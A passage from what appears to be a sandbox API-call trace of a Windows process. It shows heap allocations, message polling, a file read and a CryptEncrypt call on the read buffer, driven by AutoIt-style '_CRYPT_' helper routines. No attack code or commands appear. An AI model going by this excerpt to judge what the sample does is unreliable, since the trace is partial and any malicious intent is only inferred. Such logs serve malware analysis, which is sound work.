lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0254.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0254.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0254.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0254.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0254.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0254.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0254.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0254.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0254.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0254.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0254.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0254.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe55020 [0254.827] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0254.827] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x3ad6, lpOverlapped=0x0) returned 1 [0255.001] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0255.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0255.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0255.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0255.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0255.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad6) returned 0x3bf0050 [0255.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe55020 | out: hHeap=0x970000) returned 1 [0255.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0255.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0255.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0255.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0255.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0255.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0255.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0255.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0255.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad6) returned 0x3bf3b30 [0255.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0255.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0255.008] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0255.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0255.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0255.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0255.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0255.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad6) returned 0x3bf0050 [0255.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0255.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0255.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0255.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0255.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0255.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0255.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0255.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0255.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0255.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0255.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0255.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0255.010] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0255.010] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0255.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0255.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad6) returned 0x3bf0050 [0255.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0255.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0255.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d98 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0255.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e08 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0255.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0255.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad6) returned 0x2f14010 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0255.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0255.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0255.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0255.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0255.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0255.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0255.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0255.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0255.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0255.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0255.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0255.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.014] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0255.014] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0255.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0255.015] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.015] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0255.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0255.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0255.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0255.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0255.016] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0255.016] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0255.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0255.016] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0255.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0255.017] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.017] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0255.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.017] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0255.017] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0255.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.017] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0255.017] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.017] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0255.018] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0255.018] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.018] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0255.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0255.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0255.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0255.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0255.018] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.018] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0255.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0255.019] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0255.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0255.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0255.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0255.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0255.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51af0 [0255.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51af0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0255.020] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x3ad6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3ad8) returned 1 [0255.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0255.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0255.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0255.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0255.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0255.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0255.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0255.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0255.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0255.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0255.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0255.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0255.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0255.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0255.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0255.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0255.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0255.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0255.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0255.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0255.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0255.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0255.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0255.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0255.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0255.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0255.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0255.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 